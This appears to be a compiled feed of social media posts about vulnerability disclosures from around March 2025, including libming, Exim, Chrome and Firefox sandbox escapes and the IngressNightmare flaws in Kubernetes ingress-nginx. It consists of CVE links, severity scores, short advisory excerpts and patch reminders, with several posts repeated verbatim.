https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

Fortinet published another CVE for a vuln from 2019. Just something to keep in mind when people blame Fortinet shops when they get popped by unpatched vulns.

https://nvd.nist.gov/vuln/detail/CVE-2019-16149

🚨CVE-2025-24383: Dell Unity, Dell UnityVSA and Dell Unity XT remediation is available for multiple security vulnerabilities that could be exploited by malicious users to compromise the affected system

CVSS: 9.1

https://darkwebinformer.com/cve-2025-24383-dell-unity-dell-unityvsa-and-dell-unity-xt-remediation-is-available-for-multiple-security-vulnerabilities-that-could-be-exploited-by-malicious-users-to-compromise-the-aff/

UAF PrivEsc in Exim. I think it was @buherator who shared the Openwall link for this earlier today or yesterday. It now has a CVE published.

https://www.exim.org/static/doc/security/CVE-2025-30232.txt

https://www.openwall.com/lists/oss-security/2025/03/26/1

sev:HIGH 8.1 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

A use-after-free in Exim 4.96 through 4.98.1 could allow users (with command-line access) to escalate privileges.

https://nvd.nist.gov/vuln/detail/CVE-2025-30232

wait3() system call as a side-channel in setuid programs (nvidia-modprobe CVE-2024-0149)

https://seclists.org/oss-sec/2025/q1/254

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

Code injection in Apache Kylin.

https://lists.apache.org/thread/6j19pt8yoqfphf1lprtrzoqkvz1gwbnc

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Kylin.
If an attacker gets access to Kylin's system or project admin permission, the JDBC connection configuration maybe altered to execute arbitrary code from the remote. You are fine as long as the Kylin's system and project admin access is well protected.

This issue affects Apache Kylin: from 4.0.0 through 5.0.1.

Users are recommended to upgrade to version 5.0.2 or above, which fixes the issue.

https://nvd.nist.gov/vuln/detail/CVE-2025-30067

WatchTower: XSS To RCE By Abusing Custom File Handlers - Kentico Xperience CMS (CVE-2025-2748) https://labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/ #cybersecurity #infosec

I know that many of us tend to scoff at XSS vulns, but it's good to be reminded how they can be successfully used in a chain for something more interesting.

https://labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/

XSS To RCE By Abusing Custom File Handlers - Kentico Xperience CMS (CVE-2025-2748) - watchTowr Labs https://labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/

Multiple CVEs in gnuplot. They are all sev:MED 6.2.

https://access.redhat.com/security/cve/CVE-2025-31176

https://access.redhat.com/security/cve/CVE-2025-31178

https://access.redhat.com/security/cve/CVE-2025-31179

https://access.redhat.com/security/cve/CVE-2025-31180

https://access.redhat.com/security/cve/CVE-2025-31181

Multiple CVEs in gnuplot. They are all sev:MED 6.2.

https://access.redhat.com/security/cve/CVE-2025-31176

https://access.redhat.com/security/cve/CVE-2025-31178

https://access.redhat.com/security/cve/CVE-2025-31179

https://access.redhat.com/security/cve/CVE-2025-31180

https://access.redhat.com/security/cve/CVE-2025-31181

Multiple CVEs in gnuplot. They are all sev:MED 6.2.

https://access.redhat.com/security/cve/CVE-2025-31176

https://access.redhat.com/security/cve/CVE-2025-31178

https://access.redhat.com/security/cve/CVE-2025-31179

https://access.redhat.com/security/cve/CVE-2025-31180

https://access.redhat.com/security/cve/CVE-2025-31181

Multiple CVEs in gnuplot. They are all sev:MED 6.2.

https://access.redhat.com/security/cve/CVE-2025-31176

https://access.redhat.com/security/cve/CVE-2025-31178

https://access.redhat.com/security/cve/CVE-2025-31179

https://access.redhat.com/security/cve/CVE-2025-31180

https://access.redhat.com/security/cve/CVE-2025-31181

Multiple CVEs in gnuplot. They are all sev:MED 6.2.

https://access.redhat.com/security/cve/CVE-2025-31176

https://access.redhat.com/security/cve/CVE-2025-31178

https://access.redhat.com/security/cve/CVE-2025-31179

https://access.redhat.com/security/cve/CVE-2025-31180

https://access.redhat.com/security/cve/CVE-2025-31181

Active exploitation of critical SAP flaw CVE-2017-12637 reported by Onapsis
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/active-exploitation-of-critical-sap-flaw-cve-2017-12637-reported-by-onapsis-3-q-e-2-a/gD2P6Ple2L

Patchez Google Chrome : cette faille zero-day est exploitée par une campagne d’espionnage https://www.it-connect.fr/google-chrome-faille-zero-day-est-exploitee-campagne-espionnage-cve-2025-2783/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Google

Whoa, talk about déjà vu! Seems like Firefox is playing catch-up right after Chrome dropped a fix for a sandbox escape. 🤯 Keep an eye out for CVE-2025-2857.

So, what's the deal? In short, this nasty bug could let an attacker break right out of the browser's protective sandbox. And *that* means they could potentially gain full access to your system. Yeah, pretty scary stuff. 😱

If you're running Firefox on Windows, heads up! This affects versions 136.0.4, ESR 115.21.1, and ESR 128.8.1. This whole situation feels familiar because Chrome *just* patched CVE-2025-2783, a similar issue that attackers were already actively exploiting out in the wild!

Make no mistake, sandbox escapes are a huge deal. As a pentester, I can tell you: vulnerabilities like this get weaponized *fast*. Don't wait around.

Seriously, update your Firefox ASAP! Trust me, you don't want to deal with the fallout if someone exploits this. It could get costly, fast.

Ever seen a browser exploit do its thing live? Wild, right? Drop your stories below!

#infosec #pentesting #firefox #cybersecurity #updateNOW

CVE ID: CVE-2025-2783
Vendor: Google
Product: Chromium Mojo
Date Added: 2025-03-27
Vulnerability: Google Chromium Mojo Sandbox Escape Vulnerability
Notes: https://chromereleases.googleblog.com/2025/03/stable-channel-update-for-desktop_25.html ; https://nvd.nist.gov/vuln/detail/CVE-2025-2783
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2025-2783

This update included the fix for CVE-2025-2783.

Just to be 100% clear this update included the fix for CVE-2025-2783. We actually had that out in the previous build 7.2.3621.71 from yesterday.

Just to be 100% clear this update included the fix for CVE-2025-2783. We actually had that out in the previous build 7.2.3621.71 from yesterday.

Just to be 100% clear this update included the fix for CVE-2025-2783. Indeed we were the first non-Chrome browser to get that out.

The CVE for this is published but no CVSS assessment yet: https://nvd.nist.gov/vuln/detail/CVE-2025-2783

Google fixes exploited Chrome sandbox bypass zero-day (CVE-2025-2783) – Help Net Security https://www.macken.xyz/2025/03/google-fixes-exploited-chrome-sandbox-bypass-zero-day-cve-2025-2783-help-net-security/?utm_source=dlvr.it&utm_medium=mastodon

The vulnerability, tracked as CVE-2025-2783, was chained with a second exploit for remote code execution in attacks targeting organizations in Russia. https://www.securityweek.com/google-patches-chrome-sandbox-escape-zero-day-caught-by-kaspersky/

Bizerba doing that thing like in school where you take up as much of the page as possible. Instead of DoS they say:

An authenticated attacker can compromise the availability of the device via the network

https://www.bizerba.com/downloads/global/information-security/2025/bizerba-sa-2025-0002.pdf

Through the public FTP access the mass storage can be completely filled by mass uploading of data because no quota is in place.

sev:MED 6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

https://nvd.nist.gov/vuln/detail/CVE-2025-2820

Service desk application vulns are always fun. I don't know how popular OXARI is, but if you know it, you might want to look into this one.

https://cert.pl/en/posts/2025/03/CVE-2025-1542/

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N

Improper permission control vulnerability in the OXARI ServiceDesk application could allow an attacker using a guest access or an unprivileged account to gain additional administrative permissions in the application.This issue affects OXARI ServiceDesk in versions before 2.0.324.0.

https://nvd.nist.gov/vuln/detail/CVE-2025-1542

Apache Camel Exploit Attempt by Vulnerability Scan (CVE-2025-27636, CVE-2025-29891) https://isc.sans.edu/diary/31814

Authentication bypass CVE-2025-22230 impacts VMware Windows Tools – Source: securityaffairs.com https://ciso2ciso.com/authentication-bypass-cve-2025-22230-impacts-vmware-windows-tools-source-securityaffairs-com/ #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #SecurityNews #hackingnews #vmwaretools #Security #hacking

VMware corrige une faille importante dans les VMware Tools pour Windows : CVE-2025-22230 https://www.it-connect.fr/vmware-corrige-une-faille-vmware-tools-pour-windows-cve-2025-22230/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Windows #VMware

Discover how Kubewarden can protect you from the critical #IngressNightmare vulnerability (CVE-2025-1974): https://www.kubewarden.io/blog/2025/04/ingress-nginx-cve-2025-1974/

Discover how Kubewarden can protect you from the critical #IngressNightmare vulnerability (CVE-2025-1974): https://www.kubewarden.io/blog/2025/04/ingress-nginx-cve-2025-1974/

CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24513, CVE-2025-24514: Frequently Asked Questions About IngressNightmare #SuggestedRead #devopsish https://www.tenable.com/blog/cve-2025-1974-frequently-asked-questions-about-ingressnightmare-kubernetes

Critical Kubernetes controller flaws: 4,000 IPs exposed, with patch urgency increasing due to code to exploit CVE-2025-1974 vulnerability being published https://www.databreachtoday.com/critical-kubernetes-controller-flaws-4000-ips-exposed-a-27868

Ingress-nginx CVE-2025-1974: What You Need to Know #SuggestedRead #devopsish https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/

🚨PoC Code to Exploit the IngressNightmare Vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974)

https://darkwebinformer.com/poc-code-to-exploit-the-ingressnightmare-vulnerabilities-cve-2025-1097-cve-2025-1098-cve-2025-24514-and-cve-2025-1974/

CVE-2025-1974: Critical Set of Vulnerabilities in Ingress NGINX Controller for Kubernetes Leading to Unauthenticated RCE – Source: socprime.com https://ciso2ciso.com/cve-2025-1974-critical-set-of-vulnerabilities-in-ingress-nginx-controller-for-kubernetes-leading-to-unauthenticated-rce-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #IngressNightmare #CVE-2025-1974 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE

Ingress-nginx CVE-2025-1974: What You Need to Know | Kubernetes https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/

CVE-2025-1974 #SuggestedRead #devopsish https://github.com/kubernetes/kubernetes/issues/131009

CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24513, CVE-2025-24514: Frequently Asked Questions About IngressNightmare #SuggestedRead #devopsish https://www.tenable.com/blog/cve-2025-1974-frequently-asked-questions-about-ingressnightmare-kubernetes

CVE-2025-24513 #SuggestedRead #devopsish https://github.com/kubernetes/kubernetes/issues/131005